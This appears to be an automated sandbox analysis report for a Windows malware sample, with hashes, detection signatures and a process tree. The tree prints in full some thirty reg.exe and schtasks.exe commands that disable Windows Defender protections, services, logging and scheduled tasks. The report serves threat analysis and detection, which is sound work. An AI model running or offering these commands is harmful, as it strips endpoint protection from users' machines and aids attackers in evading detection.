Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 19:16
Static task
static1
Behavioral task
behavioral1
Sample
6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe
Resource
win7-20240508-en
General
-
Target
6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe
-
Size
91KB
-
MD5
6853ce9c7809878d2c43b55ab7bea3d9
-
SHA1
1b5498e69666c89285474493b799324948c06c47
-
SHA256
a714c2806f81699ee34724b89f5a33c35ce8e1988c98492cd125ec7fae2932d4
-
SHA512
b917b2dddda9bd2bbb8f8cb0fde79fd8eb5416ea90c1fac5c08d97a29971dffe067ceb7bf54702eec7cc7ca9b0c81c0f28d128e7c85e68f338405396020fa407
-
SSDEEP
1536:Tr7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIfVwgl3X:TnFfHgTWmCRkGbKGLeNTBfVN
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 940 wrote to memory of 1512 940 6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe 83 PID 940 wrote to memory of 1512 940 6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe 83 PID 1512 wrote to memory of 1360 1512 cmd.exe 84 PID 1512 wrote to memory of 1360 1512 cmd.exe 84 PID 1512 wrote to memory of 968 1512 cmd.exe 85 PID 1512 wrote to memory of 968 1512 cmd.exe 85 PID 1512 wrote to memory of 5056 1512 cmd.exe 86 PID 1512 wrote to memory of 5056 1512 cmd.exe 86 PID 1512 wrote to memory of 1460 1512 cmd.exe 87 PID 1512 wrote to memory of 1460 1512 cmd.exe 87 PID 1512 wrote to memory of 4932 1512 cmd.exe 88 PID 1512 wrote to memory of 4932 1512 cmd.exe 88 PID 1512 wrote to memory of 3224 1512 cmd.exe 89 PID 1512 wrote to memory of 3224 1512 cmd.exe 89 PID 1512 wrote to memory of 4132 1512 cmd.exe 90 PID 1512 wrote to memory of 4132 1512 cmd.exe 90 PID 1512 wrote to memory of 2972 1512 cmd.exe 91 PID 1512 wrote to memory of 2972 1512 cmd.exe 91 PID 1512 wrote to memory of 2308 1512 cmd.exe 92 PID 1512 wrote to memory of 2308 1512 cmd.exe 92 PID 1512 wrote to memory of 2508 1512 cmd.exe 93 PID 1512 wrote to memory of 2508 1512 cmd.exe 93 PID 1512 wrote to memory of 2788 1512 cmd.exe 94 PID 1512 wrote to memory of 2788 1512 cmd.exe 94 PID 1512 wrote to memory of 1456 1512 cmd.exe 95 PID 1512 wrote to memory of 1456 1512 cmd.exe 95 PID 1512 wrote to memory of 1176 1512 cmd.exe 96 PID 1512 wrote to memory of 1176 1512 cmd.exe 96 PID 1512 wrote to memory of 3448 1512 cmd.exe 97 PID 1512 wrote to memory of 3448 1512 cmd.exe 97 PID 1512 wrote to memory of 3396 1512 cmd.exe 98 PID 1512 wrote to memory of 3396 1512 cmd.exe 98 PID 1512 wrote to memory of 3860 1512 cmd.exe 99 PID 1512 wrote to memory of 3860 1512 cmd.exe 99 PID 1512 wrote to memory of 4920 1512 cmd.exe 100 PID 1512 wrote to memory of 4920 1512 cmd.exe 100 PID 1512 wrote to memory of 884 1512 cmd.exe 101 PID 1512 wrote to memory of 884 1512 cmd.exe 101 PID 1512 wrote to memory of 1180 1512 cmd.exe 102 PID 1512 wrote to memory of 1180 1512 cmd.exe 102 PID 1512 wrote to memory of 4704 1512 cmd.exe 103 PID 1512 wrote to memory of 4704 1512 cmd.exe 103 PID 1512 wrote to memory of 2580 1512 cmd.exe 104 PID 1512 wrote to memory of 2580 1512 cmd.exe 104 PID 1512 wrote to memory of 4908 1512 cmd.exe 105 PID 1512 wrote to memory of 4908 1512 cmd.exe 105 PID 1512 wrote to memory of 2076 1512 cmd.exe 106 PID 1512 wrote to memory of 2076 1512 cmd.exe 106 PID 1512 wrote to memory of 3620 1512 cmd.exe 107 PID 1512 wrote to memory of 3620 1512 cmd.exe 107 PID 1512 wrote to memory of 3048 1512 cmd.exe 108 PID 1512 wrote to memory of 3048 1512 cmd.exe 108 PID 1512 wrote to memory of 4072 1512 cmd.exe 109 PID 1512 wrote to memory of 4072 1512 cmd.exe 109 PID 1512 wrote to memory of 1032 1512 cmd.exe 110 PID 1512 wrote to memory of 1032 1512 cmd.exe 110 PID 1512 wrote to memory of 3644 1512 cmd.exe 111 PID 1512 wrote to memory of 3644 1512 cmd.exe 111 PID 1512 wrote to memory of 4980 1512 cmd.exe 112 PID 1512 wrote to memory of 4980 1512 cmd.exe 112 PID 1512 wrote to memory of 3208 1512 cmd.exe 113 PID 1512 wrote to memory of 3208 1512 cmd.exe 113 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2606.tmp\2607.tmp\2608.bat C:\Users\Admin\AppData\Local\Temp\6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:1360
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:968
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:5056
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:1460
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4932
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3224
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4132
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2972
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2308
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:2508
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:2788
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:1456
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:1176
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:3448
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:3396
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:3860
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:4920
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:884
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:1180
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:4704
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:2580
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:4908
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2076
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3620
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3048
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4072
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1032
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:3644
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4980
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:3208
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58760b15c6d12ecc70594fc8db876c68c
SHA1b1d47a27bf45db9955f07c773a5a334e3b528a97
SHA2569a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463
SHA5120463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee